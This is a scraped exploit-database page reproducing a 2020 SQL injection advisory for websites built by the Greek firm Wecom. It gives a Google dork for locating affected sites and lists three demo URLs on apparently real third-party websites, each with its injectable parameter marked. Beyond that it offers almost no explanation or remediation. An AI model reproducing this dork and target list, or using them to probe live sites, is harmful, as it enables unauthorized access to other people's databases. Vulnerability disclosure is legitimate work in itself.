Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100097

Below is a copy:

Wecom SQL Injection vulnerability
# Exploit Title : Wecom SQL Injection vulnerability
# Date : 2020-10-16
# Exploit Author : Arash Mousavi
# Vendor Homepage : www.wecom.gr
# Google Dork : "web site by WeC.O.M."
# Category : webapps
# Tested on : Windows 10 ,Firefox

Proof of Concept:

 search Google Dork : "web site by WeC.O.M."
 
 Demo  :
 http://tzortzopoulos.gr/bikeshop2/index.php?cat0=166'[sql Injection]
 http://www.valsamon.com/index.php?id=53&subid=2105'[sql Injection]
 http://www.grafotipos.gr/index.php?contentid=7%27'[sql Injection]
*********************************************************
# Discovered by : Arash Mousavi
# Email : [email protected]
*********************************************************

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.